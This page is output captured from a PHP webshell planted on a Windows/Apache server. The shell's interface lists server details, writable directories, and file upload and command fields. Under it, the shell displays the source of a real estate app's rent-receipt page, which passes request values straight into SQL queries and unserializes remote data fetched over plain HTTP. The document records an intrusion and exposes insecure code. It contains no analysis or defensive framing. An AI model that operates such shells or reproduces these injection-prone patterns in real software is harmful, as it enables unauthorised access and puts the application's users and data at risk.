403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64
User : win 10 ( 0)
PHP Version : 8.2.12
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  D:/Desktop/ns/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : D:/Desktop/ns/add_rent_receipt.php
<html>
<?php 
session_start();
include('db.php'); 
//include('function.php');
?>

<?php
if(isset($_SESSION['id']))
{
//$_SESSION['email']=$user_email;
$my_id = $_SESSION['id'];
//echo"$my_id";
}

if(isset($_GET['db_id2'])){
	$user_id = $_GET['db_id2'];
}
?>
<div style="display:none;">
<input type="text" id="my_id" class="helping_id" style="display:none;" value="<?php echo $my_id;?>"> 

 <?php
$user_ip = getenv('REMOTE_ADDR');
$geo = unserialize(file_get_contents("http://www.geoplugin.net/php.gp?ip=$user_ip"));
$city = $geo["geoplugin_city"];
$region = $geo["geoplugin_regionName"];
$country = $geo["geoplugin_countryName"];
/*echo"$user_ip";
echo "City: ".$city."<br>";
echo "Region: ".$region."<br>";
echo "Country: ".$country."<br>";
/*
geoplugin_request
geoplugin_status
geoplugin_credit
geoplugin_city
geoplugin_region
geoplugin_areaCode
geoplugin_dmaCode
geoplugin_countryCode
geoplugin_countryName
geoplugin_continentCode
geoplugin_latitude
geoplugin_longitude
geoplugin_regionCode
geoplugin_regionName
geoplugin_currencyCode
geoplugin_currencySymbol
geoplugin_currencySymbol_UTF8
geoplugin_currencyConverter
*/


?>

<input type="text" id="country_user" class="helping_id" style="display:none;" value="<?php echo $country;?>"> 
<input type="text" id="region_user" class="helping_id" style="display:none;" value="<?php echo $region;?>">
<input type="text" id="city_user" class="helping_id" style="display:none;" value="<?php echo $city;?>">
<input type="text" id="ip_user" class="helping_id" style="display:none;" value="<?php echo $user_ip;?>">

</div>

<head>

<title>sn real estate</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="main_css/add_rent_receipt.css" />

</head>

<body id="body">
<button onClick="history.back();" class="back_bnt" >Back</button>
<a href="logout"><button class="logout_btn" >Logout</button></a>
<div class="main_content_div" >

<div class="receipt_title_name" >SN REAL ESTATE</div>
<div class="receipt_title_location" >MAGERE</div>
<div class="receipt_title_contact" >TEL: +256751045153</div>
<div class="receipt_title_rent" >Add Rent Receipt</div>
<form method="post">
<?php 

$get_sn_tenant = "select * from sn_tenanttb where id='$user_id'";
$run_sn_tenant= mysqli_query($con,$get_sn_tenant);

	
	   while($row_get_sn_tenant = mysqli_fetch_array($run_sn_tenant))
	{
		$rented_sn_unit = $row_get_sn_tenant['rented_sn_unit'];
		$tenant_name = $row_get_sn_tenant['tenant_name'];

		?>

<input name="receipt_no" class="receipt_output_small_one" style="color:red;" placeholder="Enter Receipt No." />
<input name="receipt_date" class="receipt_output_small_two" placeholder="Enter Date..."/>
<input name="tenant_name" readOnly class="receipt_output" value="<?php echo"$tenant_name"; ?>" />
<input name="paid_amount" class="receipt_output" placeholder="Enter Amount..." />
<input name="for_the_month" class="receipt_output" placeholder="For The Month of:"/>
<input name="balance" class="receipt_output_small_one" placeholder="Balance"/>
<input name="rented_block" readOnly class="receipt_output_small_two" value="<?php echo"$rented_sn_unit"; ?>"/>
<input readOnly class="receipt_output_small_one" value="Cash"/>

<?php } 
if(isset($_POST['add_new_rental_receipt_btn']))
{
$receipt_no = $_POST['receipt_no'];
$receipt_date = $_POST['receipt_date'];
$tenant_name = $_POST['tenant_name'];
$paid_amount = $_POST['paid_amount'];
$for_the_month = $_POST['for_the_month'];
$balance = $_POST['balance'];
$rented_block = $_POST['rented_block'];

if($receipt_no =="" OR $receipt_date=="" OR $paid_amount=="" OR $for_the_month=="" OR $balance==""){
	echo"<div class='receipt_output' style='height:30px;line-height:30px;color:red;border:transparent;' >Fill All The Spaces</div>";
}else{

$get_rent_receipt ="select * from rent_receipttb where receipt_no='$receipt_no'";
$run_rent_receipt = mysqli_query($con,$get_rent_receipt);
$check_rent_receipt = mysqli_num_rows($run_rent_receipt);
if($check_rent_receipt >0){
echo"<div class='receipt_output' style='height:30px;line-height:30px;color:red;border:transparent;' >Receipt Alredy exists</div>";	
}else{

$insert_receipt = "insert into rent_receipttb (my_id,user_id,tenant_name,receipt_no,amount,for_the_month,balance,rented_block,receipt_date,cur_city,cur_country,cur_date,cur_time) 
values('$my_id','$user_id','$tenant_name','$receipt_no','$paid_amount','$for_the_month','$balance','$rented_block','$receipt_date','$city','$country',CURDATE(),CURTIME() )";
$run_insert_rent_receipt = mysqli_query($con,$insert_receipt);
echo"<div class='receipt_output' style='height:30px;line-height:30px;color:green;border:transparent;' >New Receipt Added, Thanks</div>";
}
}
}
?>
<button name="add_new_rental_receipt_btn" class="main_dash" >Enter</button>
</form>

</div>





</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit